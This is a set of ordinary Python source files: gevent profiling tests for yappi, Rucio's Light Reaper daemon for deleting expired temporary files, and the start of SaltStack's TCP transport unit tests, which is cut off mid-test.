g1 = self.spawn_greenlet("a_%d" % (n-1), a, n - 1)
g1.get()
g2 = self.spawn_greenlet("a_%d" % (n-2), a, n - 2)
g2.get()
yappi.start()
g = self.spawn_greenlet("a", a, 3)
g.get() # run until complete, report exception (if any)
yappi.stop()
r1 = '''
..p/yappi/tests/test_asyncio.py:11 a 9 0.000124 0.400667 0.044519
../yappi/tests/utils.py:126 burn_cpu 4 0.000000 0.400099 0.100025
sleep 4 0.000000 0.000444 0.000111
'''
stats = yappi.get_func_stats()
self.assert_traces_almost_equal(r1, stats)
gstats = yappi.get_greenlet_stats()
r2 = '''
Main/a/a_1 9 0.100588 3
Main/a/a_2 4 0.100588 3
Main/a 3 0.100584 3
Main/a/a_2/a_1 5 0.100549 3
Main 1 0.000356 2
Main/a/a_1/a_0 10 0.000046 1
Main/a/a_2/a_1/a_0 6 0.000044 1
Main/a/a_2/a_1/a_-1 7 0.000036 1
Main/a/a_2/a_0 8 0.000035 1
Main/a/a_1/a_-1 11 0.000029 1
'''
self.assert_ctx_stats_almost_equal(r2, gstats)
def test_basic_old_style(self):
def a():
burn_io_gevent(0.1)
burn_io(0.1)
burn_io_gevent(0.1)
burn_io(0.1)
burn_io_gevent(0.1)
burn_cpu(0.3)
yappi.set_clock_type("wall")
yappi.start(builtins=True)
g1 = self.spawn_greenlet("a_1", a)
g1.get()
g2 = self.spawn_greenlet("a_2", a)
g2.get()
yappi.stop()
r1 = '''
..p/yappi/tests/test_asyncio.py:43 a 2 0.000118 1.604049 0.802024
burn_io_gevent 6 0.000000 0.603239 0.100540
../yappi/tests/utils.py:126 burn_cpu 2 0.000000 0.600026 0.300013
..p/yappi/tests/utils.py:135 burn_io 4 0.000025 0.400666 0.100166
'''
stats = yappi.get_func_stats()
self.assert_traces_almost_equal(r1, stats)
gstats = yappi.get_greenlet_stats()
r2 = '''
Main 1 1.623057 3
Main/a_1 3 0.812399 1
Main/a_2 4 0.810234 1
'''
self.assert_ctx_stats_almost_equal(r2, gstats)
yappi.clear_stats()
yappi.set_clock_type("cpu")
yappi.start(builtins=True)
g1 = self.spawn_greenlet("a_1", a)
g1.get()
g2 = self.spawn_greenlet("a_2", a)
g2.get()
yappi.stop()
stats = yappi.get_func_stats()
r1 = '''
..p/yappi/tests/test_asyncio.py:43 a 2 0.000117 0.601170 0.300585
../yappi/tests/utils.py:126 burn_cpu 2 0.000000 0.600047 0.300024
burn_io_gevent 6 0.000159 0.000801 0.000134
'''
self.assert_traces_almost_equal(r1, stats)
gstats = yappi.get_greenlet_stats()
r2 = '''
Main/a_2 6 0.301190 1
Main/a_1 5 0.300960 1
Main 1 0.000447 3
'''
self.assert_ctx_stats_almost_equal(r2, gstats)
def test_recursive_function(self):
def a(n):
if (n <= 0):
return
burn_io_gevent(0.001)
burn_cpu(0.1)
a(n - 1)
a(n - 2)
def driver():
gls = []
for i in (3, 4):
gls.append(self.spawn_greenlet("recursive_%d" % (i), a, i))
for gl in gls:
gl.get()
yappi.set_clock_type("cpu")
yappi.start()
driver()
yappi.stop()
r1 = '''
tests/test_gevent.py:209 a 24/2 0.000407 1.102129 0.045922
../yappi/tests/utils.py:142 burn_cpu 11 0.000000 1.100660 0.100060
../tests/utils.py:154 burn_io_gevent 11 0.000159 0.001062 0.000097
..e-packages/gevent/hub.py:126 sleep 11 0.000903 0.000903 0.000082
tests/test_gevent.py:219 driver 1 0.000208 0.000467 0.000467
'''
stats = yappi.get_func_stats()
self.assert_traces_almost_equal(r1, stats)
gstats = yappi.get_greenlet_stats()
r2 = '''
Main/recursive_4 4 0.701283 5
Main/recursive_3 3 0.400664 5
Main 1 0.000439 3
'''
self.assert_ctx_stats_almost_equal(r2, gstats)
def test_exception_raised(self):
def a(n):
burn_cpu(0.1)
burn_io_gevent(0.1)
if (n == 0):
raise Exception
a(n-1)
yappi.set_clock_type("cpu")
yappi.start()
try:
gevent.spawn(a, 3).get()
except Exception:
pass
yappi.stop()
stats = yappi.get_func_stats()
t1 = '''
tests/test_gevent.py:118 a 4/1 0.000149 0.400614 0.100153
../yappi/tests/utils.py:126 burn_cpu 4 0.000000 0.400208 0.100052
'''
self.assert_traces_almost_equal(t1, stats)
def test_greenlets_spawned_before_profile(self):
def a(ev1, ev2):
a_inner_1(ev1, ev2)
burn_cpu(0.1)
def a_inner_1(ev1, ev2):
a_inner_2(ev1, ev2)
burn_cpu(0.1)
def a_inner_2(ev1, ev2):
ev1.set()
ev2.wait()
a_inner_3()
def a_inner_3():
burn_cpu(0.1)
burn_io_gevent(0.1)
ev1 = Event()
ev2 = Event()
gl = self.spawn_greenlet("a", a, ev1, ev2)
# wait for greenlet to pause
ev1.wait()
yappi.set_clock_type("cpu")
yappi.start()
# resume greenlet and wait for completion
ev2.set()
gl.get()
yappi.stop()
stats = yappi.get_func_stats()
t1 = '''
../yappi/tests/utils.py:126 burn_cpu 3 0.000000 0.300119 0.100040
tests/test_gevent.py:161 a_inner_3 1 0.000041 0.100209 0.100209
'''
self.assert_traces_almost_equal(t1, stats)
gstats = yappi.get_greenlet_stats()
r2 = '''
Main/a 2 0.300425 1
Main 1 0.000145 2
'''
self.assert_ctx_stats_almost_equal(r2, gstats)
def test_many_context_switches(self):
def common():
for _ in range(100):
burn_io_gevent(0.001)
burn_io(0.1)
burn_cpu(0.2)
for _ in range(100):
burn_io_gevent(0.001)
burn_io(0.1)
burn_cpu(0.2)
def a():
common()
def b():
common()
def driver():
gls = []
for idx, func in enumerate((a, a, b, b)):
gls.append(self.spawn_greenlet("func_%d" % (idx), func))
for gl in gls:
gl.get()
yappi.set_clock_type("cpu")
yappi.start()
driver()
yappi.stop()
stats = yappi.get_func_stats()
t1 = '''
tests/test_gevent.py:128 common 4 0.004040 1.619333 0.404833
../yappi/tests/utils.py:126 burn_cpu 8 0.000000 1.600398 0.200050
tests/test_gevent.py:141 a 2 0.000021 0.810061 0.405030
tests/test_gevent.py:144 b 2 0.000021 0.809314 0.404657
'''
self.assert_traces_almost_equal(t1, stats)
gstats = yappi.get_greenlet_stats()
r2 = '''
Main/func_3 6 0.417321 201
Main/func_2 5 0.416521 201
Main/func_0 3 0.414553 201
Main/func_1 4 0.413268 201
Main 1 0.000579 3
'''
self.assert_ctx_stats_almost_equal(r2, gstats)
def test_default_context_name_cbk(self):
# Set context backend to configure default callbacks
yappi.set_context_backend("greenlet")
def a():
burn_cpu(0.1)
class GreenletA(gevent.Greenlet):
pass
yappi.start()
g = GreenletA(a)
g.start()
g.get()
yappi.stop()
gstats = yappi.get_greenlet_stats()
r2 = '''
GreenletA 3 0.100060 1
greenlet 1 0.000240 2
'''
self.assert_ctx_stats_almost_equal(r2, gstats)
class MultiThreadTests(GeventTest):
def test_basic(self):
def a():
burn_io_gevent(0.3)
burn_cpu(0.4)
def b():
g = self.spawn_greenlet("a", a)
return g.get()
def recursive_a(n):
if not n:
return
burn_cpu(0.3)
burn_io_gevent(0.3)
g = self.spawn_greenlet("rec_a", recursive_a, n - 1)
return g.get()
yappi.set_clock_type("cpu")
def driver():
to_run = [
(a, ()),
(b, ()),
(recursive_a, (5,)),
(recursive_a, (5,))
]
ts = []
for idx, (func, args) in enumerate(to_run):
t = self.spawn_thread("%s-%d" % (func.__name__, idx), func, *args)
ts.append(t)
for t in ts:
t.join()
yappi.start()
driver()
yappi.stop()
traces = yappi.get_func_stats()
t1 = '''
../yappi/tests/utils.py:126 burn_cpu 12 0.000000 3.801261 0.316772
tests/test_gevent.py:96 recursive_a 12 0.001707 3.014276 0.251190
tests/test_gevent.py:88 a 2 0.000088 0.800840 0.400420
burn_io_gevent 12 0.011484 0.011484 0.000957
tests/test_gevent.py:132 driver 1 0.000169 0.009707 0.009707
tests/test_gevent.py:92 b 1 0.000121 0.000162 0.000162
'''
self.assert_traces_almost_equal(t1, traces)
stats = yappi.get_greenlet_stats()
r2 = '''
Main/a-0 2 0.400421 59
Main/b-1/a 6 0.400228 58
Main/recursive_a-3 8 0.301177 33
Main/recursive_a-2 7 0.300615 36
Main/recursive_a-2/rec_a/rec_a/rec_a 16 0.300509 42
Main/recursive_a-2/rec_a/rec_a/rec_a/rec_a 18 0.300505 42
Main/recursive_a-3/rec_a/rec_a/rec_a/rec_a 17 0.300481 39
Main/recursive_a-3/rec_a 11 0.300464 45
Main/recursive_a-3/rec_a/rec_a 13 0.300456 35
Main/recursive_a-3/rec_a/rec_a/rec_a 15 0.300456 36
Main/recursive_a-2/rec_a/rec_a 14 0.300423 29
Main/recursive_a-2/rec_a 12 0.300359 41
Main 1 0.002443 7
Main/b-1 4 0.000595 2
Main/recursive_a-3/rec_a/rec_a/rec_a/rec_a/rec_a 19 0.000048 1
Main/recursive_a-2/rec_a/rec_a/rec_a/rec_a/rec_a 20 0.000047 1
'''
self.assert_ctx_stats_almost_equal(r2, stats)
def test_profile_greenlets_false(self):
def recursive_a(n):
if not n:
return
burn_cpu(0.1)
burn_io_gevent(0.1)
g = self.spawn_greenlet("rec", recursive_a, n - 1)
return g.get()
yappi.set_clock_type("cpu")
def driver():
to_run = [
(recursive_a, (5,)),
(recursive_a, (5,))
]
ts = []
for idx, (func, args) in enumerate(to_run):
t = self.spawn_thread("%s_%d" % (func.__name__, idx), func, *args)
ts.append(t)
recursive_a(6)
for t in ts:
t.join()
yappi.start(profile_greenlets=False)
driver()
yappi.stop()
traces = yappi.get_func_stats()
t1 = '''
tests/test_gevent.py:359 driver 1 0.000061 0.101845 0.101845
tests/test_gevent.py:335 recursive_a 1 0.000262 0.100619 0.100619
../yappi/tests/utils.py:126 burn_cpu 1 0.000000 0.100082 0.100082
'''
self.assert_traces_almost_equal(t1, traces)
gstats = yappi.get_greenlet_stats()
r2 = '''
Main 1 0.101944 1
'''
self.assert_ctx_stats_almost_equal(r2, gstats)
def test_default_ctx_name_callback(self):
# Set context backend to confgiure default callbacks
yappi.set_context_backend("greenlet")
class GreenletA(gevent.Greenlet):
pass
def thread_a():
g = GreenletA(a)
g.start()
g.get()
def a():
burn_cpu(0.1)
def thread_b():
g = GreenletB(b)
g.start()
g.get()
class GreenletB(gevent.Greenlet):
pass
def b():
burn_cpu(0.2)
def driver():
tA = self.spawn_thread("a", thread_a)
tB = self.spawn_thread("b", thread_b)
tA.join()
tB.join()
yappi.start()
driver()
yappi.stop()
gstats = yappi.get_greenlet_stats()
r2 = '''
GreenletB 7 0.200104 9
GreenletA 4 0.100082 8
'''
self.assert_ctx_stats_almost_equal(r2, gstats)
if __name__ == '__main__':
unittest.main()
|
light_reaper.py | # -*- coding: utf-8 -*-
# Copyright 2016-2021 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Vincent Garonne <vincent.garonne@cern.ch>, 2016-2018
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Andrew Lister <andrew.lister@stfc.ac.uk>, 2019
# - Thomas Beermann <thomas.beermann@cern.ch>, 2019-2021
# - Brandon White <bjwhite@fnal.gov>, 2019
# - Patrick Austin <patrick.austin@stfc.ac.uk>, 2020
# - Benedikt Ziemons <benedikt.ziemons@cern.ch>, 2020
# - David Poblaciรณn Criado <david.poblacion.criado@cern.ch>, 2021
# - Joel Dierkes <joel.dierkes@cern.ch>, 2021
'''
Light Reaper is a daemon to manage temporary object/file deletion.
'''
import hashlib
import logging
import os
import random
import socket
import sys
import threading
import time
import traceback
import rucio.db.sqla.util
from rucio.common.config import config_get_bool
from rucio.common.exception import (SourceNotFound, DatabaseException, ServiceUnavailable,
RSEAccessDenied, RSENotFound, ResourceTemporaryUnavailable, VONotFound)
from rucio.common.logging import setup_logging, formatted_logger
from rucio.common.utils import daemon_sleep
from rucio.core import rse as rse_core
from rucio.core.heartbeat import live, die, sanity_check
from rucio.core.message import add_message
from rucio.core.rse_expression_parser import parse_expression
from rucio.core.temporary_did import (list_expired_temporary_dids, delete_temporary_dids)
from rucio.core.vo import list_vos
from rucio.rse import rsemanager as rsemgr
logging.getLogger("requests").setLevel(logging.CRITICAL)
GRACEFUL_STOP = threading.Event()
def reaper(rses=[], worker_number=0, total_workers=1, chunk_size=100, once=False, scheme=None, sleep_time=60):
"""
Main loop to select and delete files.
:param rses: List of RSEs the reaper should work against. If empty, it considers all RSEs.
:param worker_number: The worker number.
:param total_workers: The total number of workers.
:param chunk_size: the size of chunk for deletion.
:param once: If True, only runs one iteration of the main loop.
:param scheme: Force the reaper to use a particular protocol, e.g., mock.
:param sleep_time: Thread sleep time after each chunk of work.
"""
logging.info('Starting Light Reaper %s-%s: Will work on RSEs: %s', worker_number, total_workers, ', '.join([rse['rse'] for rse in rses]))
pid = os.getpid()
thread = threading.current_thread()
hostname = socket.gethostname()
executable = ' '.join(sys.argv)
hash_executable = hashlib.sha256(sys.argv[0] + ''.join([rse['rse'] for rse in rses])).hexdigest()
sanity_check(executable=None, hostname=hostname)
while not GRACEFUL_STOP.is_set():
try:
# heartbeat
heartbeat = live(executable=executable, hostname=hostname, pid=pid, thread=thread, hash_executable=hash_executable)
prepend_str = 'light-reaper [%i/%i] : ' % (heartbeat['assign_thread'], heartbeat['nr_threads'])
logger = formatted_logger(logging.log, prepend_str + '%s')
logger(logging.INFO, 'Live gives {0[heartbeat]}'.format(locals()))
nothing_to_do = True
start_time = time.time()
random.shuffle(rses)
for rse in rses:
rse_id = rse['id']
rse = rse['rse']
replicas = list_expired_temporary_dids(rse_id=rse_id,
limit=chunk_size, worker_number=worker_number,
total_workers=total_workers)
rse_info = rsemgr.get_rse_info(rse_id=rse_id)
rse_protocol = rse_core.get_rse_protocols(rse_id=rse_id)
prot = rsemgr.create_protocol(rse_info, 'delete', scheme=scheme)
deleted_replicas = []
try:
prot.connect()
for replica in replicas:
nothing_to_do = False
try:
# pfn = str(rsemgr.lfns2pfns(rse_settings=rse_info,
# lfns=[{'scope': replica['scope'].external, 'name': replica['name'], 'path': replica['path']}],
# operation='delete', scheme=scheme).values()[0])
pfn = 's3://%s%s%s' % (prot.attributes['hostname'], prot.attributes['prefix'], replica['name'])
# logging.debug('Light Reaper %s-%s: Deletion ATTEMPT of %s:%s as %s on %s', worker_number, total_workers, replica['scope'], replica['name'], pfn, rse)
start = time.time()
prot.delete(pfn)
duration = time.time() - start
logger(logging.INFO, 'Deletion SUCCESS of %s:%s as %s on %s in %s seconds', replica['scope'], replica['name'], pfn, rse, duration)
payload = {'scope': replica['scope'].external,
'name': replica['name'],
'rse': rse,
'rse_id': rse_id,
'file-size': replica.get('bytes') or 0,
'bytes': replica.get('bytes') or 0,
'url': pfn,
'duration': duration,
'protocol': prot.attributes['scheme']}
if replica['scope'].vo != 'def':
payload['vo'] = replica['scope'].vo
add_message('deletion-done', payload)
deleted_replicas.append(replica)
except SourceNotFound:
err_msg = 'Deletion NOTFOUND of %s:%s as %s on %s' % (replica['scope'], replica['name'], pfn, rse)
logger(logging.WARNING, err_msg)
deleted_replicas.append(replica)
except (ServiceUnavailable, RSEAccessDenied, ResourceTemporaryUnavailable) as error:
err_msg = 'Deletion NOACCESS of %s:%s as %s on %s: %s' % (replica['scope'], replica['name'], pfn, rse, str(error))
logger(logging.WARNING, err_msg)
payload = {'scope': replica['scope'].external,
'name': replica['name'],
'rse': rse,
'rse_id': rse_id,
'file-size': replica['bytes'] or 0,
'bytes': replica['bytes'] or 0,
'url': pfn,
'reason': str(error),
'protocol': prot.attributes['scheme']}
if replica['scope'].vo != 'def':
payload['vo'] = replica['scope'].vo
add_message('deletion-failed', payload)
except:
logger(logging.CRITICAL, traceback.format_exc())
finally:
prot.close()
delete_temporary_dids(dids=deleted_replicas)
if once:
break
if once:
break
if nothing_to_do:
logger(logging.INFO, 'Nothing to do. I will sleep for 60s')
daemon_sleep(start_time=start_time, sleep_time=sleep_time, graceful_stop=GRACEFUL_STOP)
except DatabaseException as error:
logging.warning('Reaper: %s', str(error))
except:
logging.critical(traceback.format_exc())
die(executable=executable, hostname=hostname, pid=pid, thread=thread, hash_executable=hash_executable)
logging.info('Graceful stop requested')
logging.info('Graceful stop done')
return
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
GRACEFUL_STOP.set()
def run(total_workers=1, chunk_size=100, once=False, rses=[], scheme=None,
exclude_rses=None, include_rses=None, vos=None, delay_seconds=0, sleep_time=60):
"""
Starts up the reaper threads.
:param total_workers: The total number of workers.
:param chunk_size: the size of chunk for deletion.
:param once: If True, only runs one iteration of the main loop.
:param rses: List of RSEs the reaper should work against. If empty, it considers all RSEs. (Single-VO only)
:param scheme: Force the reaper to use a particular protocol/scheme, e.g., mock.
:param exclude_rses: RSE expression to exclude RSEs from the Reaper.
:param include_rses: RSE expression to include RSEs.
:param vos: VOs on which to look for RSEs. Only used in multi-VO mode.
If None, we either use all VOs if run from "def", or the current VO otherwise.
:param sleep_time: Thread sleep time after each chunk of work.
"""
setup_logging()
if rucio.db.sqla.util.is_old_db():
raise DatabaseException('Database was not updated, daemon won\'t start')
logging.info('main: starting processes')
multi_vo = config_get_bool('common', 'multi_vo', raise_exception=False, default=False)
if not multi_vo:
if vos:
logging.warning('Ignoring argument vos, this is only applicable in a multi-VO setup.')
vos = ['def']
else:
if vos:
invalid = set(vos) - set([v['vo'] for v in list_vos()])
if invalid:
msg = 'VO{} {} cannot be found'.format('s' if len(invalid) > 1 else '', ', '.join([repr(v) for v in invalid]))
raise VONotFound(msg)
else:
vos = [v['vo'] for v in list_vos()]
logging.info('Light Reaper: This instance will work on VO%s: %s' % ('s' if len(vos) > 1 else '', ', '.join([v for v in vos])))
all_rses = []
for vo in vos:
all_rses.extend(rse_core.list_rses(filters={'vo': vo}))
if rses:
invalid = set(rses) - set([rse['rse'] for rse in all_rses])
if invalid:
msg = 'RSE{} {} cannot be found'.format('s' if len(invalid) > 1 else '',
', '.join([repr(rse) for rse in invalid]))
raise RSENotFound(msg)
rses = [rse for rse in all_rses if rse['rse'] in rses]
else:
rses = all_rses
if exclude_rses:
excluded_rses = parse_expression(exclude_rses)
rses = [rse for rse in rses if rse not in excluded_rses]
if include_rses:
included_rses = parse_expression(include_rses)
rses = [rse for rse in rses if rse in included_rses]
if not rses:
logging.error('Light Reaper: No RSEs found. Exiting.')
return
threads = []
for worker in range(total_workers):
kwargs = {'worker_number': worker,
'total_workers': total_workers,
'rses': rses,
'once': once,
'chunk_size': chunk_size,
'scheme': scheme,
'sleep_time': sleep_time}
threads.append(threading.Thread(target=reaper, kwargs=kwargs, name='Worker: %s, Total_Workers: %s' % (worker, total_workers)))
[t.start() for t in threads]
while threads[0].is_alive():
[t.join(timeout=3.14) for t in threads]
|
test_tcp.py | """
:codeauthor: Thomas Jackson <jacksontj.89@gmail.com>
"""
import logging
import socket
import threading
import salt.config
import salt.exceptions
import salt.ext.tornado.concurrent
import salt.ext.tornado.gen
import salt.ext.tornado.ioloop
import salt.transport.client
import salt.transport.server
import salt.utils.platform
import salt.utils.process
from salt.ext.tornado.testing import AsyncTestCase, gen_test
from salt.transport.tcp import (
SaltMessageClient,
SaltMessageClientPool,
TCPPubServerChannel,
)
from saltfactories.utils.ports import get_unused_localhost_port
from tests.support.helpers import flaky, slowTest
from tests.support.mixins import AdaptedConfigurationTestCaseMixin
from tests.support.mock import MagicMock, patch
from tests.support.unit import TestCase, skipIf
from tests.unit.transport.mixins import (
PubChannelMixin,
ReqChannelMixin,
run_loop_in_thread,
)
log = logging.getLogger(__name__)
class BaseTCPReqCase(TestCase, AdaptedConfigurationTestCaseMixin):
"""
Test the req server/client pair
"""
@classmethod
def setUpClass(cls):
if not hasattr(cls, "_handle_payload"):
return
ret_port = get_unused_localhost_port()
publish_port = get_unused_localhost_port()
tcp_master_pub_port = get_unused_localhost_port()
tcp_master_pull_port = get_unused_localhost_port()
tcp_master_publish_pull = get_unused_localhost_port()
tcp_master_workers = get_unused_localhost_port()
cls.master_config = cls.get_temp_config(
"master",
**{
"transport": "tcp",
"auto_accept": True,
"ret_port": ret_port,
"publish_port": publish_port,
"tcp_master_pub_port": tcp_master_pub_port,
"tcp_master_pull_port": tcp_master_pull_port,
"tcp_master_publish_pull": tcp_master_publish_pull,
"tcp_master_workers": tcp_master_workers,
}
)
cls.minion_config = cls.get_temp_config(
"minion",
**{
"transport": "tcp",
"master_ip": "127.0.0.1",
"master_port": ret_port,
"master_uri": "tcp://127.0.0.1:{}".format(ret_port),
}
)
cls.process_manager = salt.utils.process.ProcessManager(
name="ReqServer_ProcessManager"
)
cls.server_channel = salt.transport.server.ReqServerChannel.factory(
cls.master_config
)
cls.server_channel.pre_fork(cls.process_manager)
cls.io_loop = salt.ext.tornado.ioloop.IOLoop()
cls.stop = threading.Event()
cls.server_channel.post_fork(cls._handle_payload, io_loop=cls.io_loop)
cls.server_thread = threading.Thread(
target=run_loop_in_thread, args=(cls.io_loop, cls.stop,),
)
cls.server_thread.start()
@classmethod
def tearDownClass(cls):
cls.server_channel.close()
cls.stop.set()
cls.server_thread.join()
cls.process_manager.kill_children()
del cls.server_channel
@classmethod
@salt.ext.tornado.gen.coroutine
def _handle_payload(cls, payload):
"""
TODO: something besides echo
"""
raise salt.ext.tornado.gen.Return((payload, {"fun": "send_clear"}))
@skipIf(salt.utils.platform.is_darwin(), "hanging test suite on MacOS")
class ClearReqTestCases(BaseTCPReqCase, ReqChannelMixin):
"""
Test all of the clear msg stuff
"""
def setUp(self):
self.channel = salt.transport.client.ReqChannel.factory(
self.minion_config, crypt="clear"
)
def tearDown(self):
self.channel.close()
del self.channel
@classmethod
@salt.ext.tornado.gen.coroutine
def _handle_payload(cls, payload):
"""
TODO: something besides echo
"""
raise salt.ext.tornado.gen.Return((payload, {"fun": "send_clear"}))
@skipIf(salt.utils.platform.is_darwin(), "hanging test suite on MacOS")
class AESReqTestCases(BaseTCPReqCase, ReqChannelMixin):
def setUp(self):
self.channel = salt.transport.client.ReqChannel.factory(self.minion_config)
def tearDown(self):
self.channel.close()
del self.channel
@classmethod
@salt.ext.tornado.gen.coroutine
def _handle_payload(cls, payload):
"""
TODO: something besides echo
"""
raise salt.ext.tornado.gen.Return((payload, {"fun": "send"}))
# TODO: make failed returns have a specific framing so we can raise the same exception
# on encrypted channels
@flaky
@slowTest
def test_badload(self):
"""
Test a variety of bad requests, make sure that we get some sort of error
"""
msgs = ["", [], tuple()]
for msg in msgs:
with self.assertRaises(salt.exceptions.AuthenticationError):
ret = self.channel.send(msg)
class BaseTCPPubCase(AsyncTestCase, AdaptedConfigurationTestCaseMixin):
"""
Test the req server/client pair
"""
@classmethod
def setUpClass(cls):
ret_port = get_unused_localhost_port()
publish_port = get_unused_localhost_port()
tcp_master_pub_port = get_unused_localhost_port()
tcp_master_pull_port = get_unused_localhost_port()
tcp_master_publish_pull = get_unused_localhost_port()
tcp_master_workers = get_unused_localhost_port()
cls.master_config = cls.get_temp_config(
"master",
**{
"transport": "tcp",
"auto_accept": True,
"ret_port": ret_port,
"publish_port": publish_port,
"tcp_master_pub_port": tcp_master_pub_port,
"tcp_master_pull_port": tcp_master_pull_port,
"tcp_master_publish_pull": tcp_master_publish_pull,
"tcp_master_workers": tcp_master_workers,
}
)
cls.minion_config = cls.get_temp_config(
"minion",
**{
"transport": "tcp",
"master_ip": "127.0.0.1",
"auth_timeout": 1,
"master_port": ret_port,
"master_uri": "tcp://127.0.0.1:{}".format(ret_port),
}
)
cls.process_manager = salt.utils.process.ProcessManager(
name="ReqServer_ProcessManager"
)
cls.server_channel = salt.transport.server.PubServerChannel.factory(
cls.master_config
)
cls.server_channel.pre_fork(cls.process_manager)
# we also require req server for auth
cls.req_server_channel = salt.transport.server.ReqServerChannel.factory(
cls.master_config
)
cls.req_server_channel.pre_fork(cls.process_manager)
cls.io_loop = salt.ext.tornado.ioloop.IOLoop()
cls.stop = threading.Event()
cls.req_server_channel.post_fork(cls._handle_payload, io_loop=cls.io_loop)
cls.server_thread = threading.Thread(
target=run_loop_in_thread, args=(cls.io_loop, cls.stop,),
)
cls.server_thread.start()
@classmethod
def _handle_payload(cls, payload):
"""
TODO: something besides echo
"""
return payload, {"fun": "send_clear"}
@classmethod
def tearDownClass(cls):
cls.req_server_channel.close()
cls.server_channel.close()
cls.stop.set()
cls.server_thread.join()
cls.process_manager.kill_children()
del cls.req_server_channel
def setUp(self):
super().setUp()
self._start_handlers = dict(self.io_loop._handlers)
def tearDown(self):
super().tearDown()
failures = []
for k, v in self.io_loop._handlers.items():
if self._start_handlers.get(k) != v:
failures.append((k, v))
if failures:
raise Exception("FDs still attached to the IOLoop: {}".format(failures))
del self.channel
del self._start_handlers
class AsyncTCPPubChannelTest(AsyncTestCase, AdaptedConfigurationTestCaseMixin):
@slowTest
def test_connect_publish_port(self):
"""
test when publish_port is not 4506
"""
opts = self.get_temp_config("master")
opts["master_uri"] = ""
opts["master_ip"] = "127.0.0.1"
opts["publish_port"] = 1234
channel = salt.transport.tcp.AsyncTCPPubChannel(opts)
patch_auth = MagicMock(return_value=True)
patch_client = MagicMock(spec=SaltMessageClientPool)
with patch("salt.crypt.AsyncAuth.gen_token", patch_auth), patch(
"salt.crypt.AsyncAuth.authenticated", patch_auth
), patch("salt.transport.tcp.SaltMessageClientPool", patch_client):
channel.connect()
assert patch_client.call_args[0][0]["publish_port"] == opts["publish_port"]
@skipIf(True, "Skip until we can devote time to fix this test")
class AsyncPubChannelTest(BaseTCPPubCase, PubChannelMixin):
"""
Tests around the publish system
"""
class SaltMessageClientPoolTest(AsyncTestCase):
def setUp(self):
super().setUp()
sock_pool_size = 5
with patch(
"salt.transport.tcp.SaltMessageClient.__init__",
MagicMock(return_value=None),
):
self.message_client_pool = SaltMessageClientPool(
{"sock_pool_size": sock_pool_size}, args=({}, "", 0)
)
self.original_message_clients = self.message_client_pool.message_clients
self.message_client_pool.message_clients = [
MagicMock() for _ in range(sock_pool_size)
]
def tearDown(self):
with patch(
"salt.transport.tcp.SaltMessageClient.close", MagicMock(return_value=None)
):
del self.original_message_clients
super().tearDown()
def test_send(self):
for message_client_mock in self.message_client_pool.message_clients:
message_client_mock.send_queue = [0, 0, 0]
message_client_mock.send.return_value = []
self.assertEqual([], self.message_client_pool.send())
self.message_client_pool.message_clients[2].send_queue = [0]
self.message_client_pool.message_clients[2].send.return_value = [1]
self.assertEqual([1], self.message_client_pool.send())
def test_write_to_stream(self):
for message_client_mock in self.message_client_pool.message_clients:
message_client_mock.send_queue = [0, 0, 0]
message_client_mock._stream.write.return_value = []
self.assertEqual([], self.message_client_pool.write_to_stream(""))
self.message_client_pool.message_clients[2].send_queue = [0]
self.message_client_pool.message_clients[2]._stream.write.return_value = [1]
self.assertEqual([1], self.message_client_pool.write_to_stream(""))
def test_close(self):
self.message_client_pool.close()
self.assertEqual([], self.message_client_pool.message_clients)
def test_on_recv(self):
for message_client_mock in self.message_client_pool.message_clients:
message_client_mock.on_recv.return_value = None
self.message_client_pool.on_recv()
for message_client_mock in self.message_client_pool.message_clients:
self.assertTrue(message_client_mock.on_recv.called)
def test_connect_all(self):
@gen_test
def test_connect(self):
yield self.message_client_pool.connect()
for message_client_mock in self.message_client_pool.message_clients:
future = salt.ext.tornado.concurrent.Future()
future.set_result("foo")
message_client_mock.connect.return_value = future
self.assertIsNone(test_connect(self))
def test_connect_partial(self):
@gen_test(timeout=0.1)
def test_connect(self):
yield self.message_client_pool.connect()
for idx, message_client_mock in enumerate(
self.message_client_pool.message_clients
):
future = salt.ext.tornado.concurrent.Future()
if idx % 2 == 0:
future.set_result("foo")
message_client_mock.connect.return_value = future
with self.assertRaises(salt.ext.tornado.ioloop.TimeoutError):
test_connect(self)
class SaltMessageClientCleanupTest(TestCase, AdaptedConfigurationTestCaseMixin):
def setUp(self):
self.listen_on = "127.0.0.1"
self.port = get_unused_localhost_port()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind((self.listen_on, self.port))
self.sock.listen(1)
def tearDown(self):
self.sock.close()
del self.sock
def test_message_client(self):
"""
test message client cleanup on close
"""
orig_loop = salt.ext.tornado.ioloop.IOLoop()
orig_loop.make_current()
opts = self.get_temp_config("master")
client = SaltMessageClient(opts, self.listen_on, self.port)
# Mock the io_loop's stop method so we know when it has been called.
orig_loop.real_stop = orig_loop.stop
orig_loop.stop_called = False
def stop(*args, **kwargs):
orig_loop.stop_called = True
orig_loop.real_stop()
orig_loop.stop = stop
try:
assert client.io_loop == orig_loop
client.io_loop.run_sync(client.connect)
# Ensure we are testing the _read_until_future and io_loop teardown
assert client._stream is not None
assert client._read_until_future is not None
assert orig_loop.stop_called is True
# The run_sync call will set stop_called, reset it
orig_loop.stop_called = False
client.close()
# Stop should be called again, client's io_loop should be None
assert orig_loop.stop_called is True
assert client.io_loop is None
finally:
orig_loop.stop = orig_loop.real_stop
del orig_loop.real_stop
del orig_loop.stop_called
class TCPPubServerChannelTest(TestCase, AdaptedConfigurationTestCaseMixin):
@patch("salt.master.SMaster.secrets")
@patch("salt.crypt.Crypticle")
@patch("salt.utils.asynchronous.SyncWrapper")
def test_publish_filtering(self, sync_wrapper, crypticle, secrets):
opts = self.get_temp_config("master")
opts["sign_pub_messages"] = False
channel = TCPPubServerChannel(opts)
wrap = MagicMock()
crypt = MagicMock()
crypt.dumps.return_value = {"test": "value"}
secrets.return_value = {"aes": {"secret": None}}
crypticle.return_value = crypt
sync_wrapper.return_value = wrap
# try simple publish with glob tgt_type
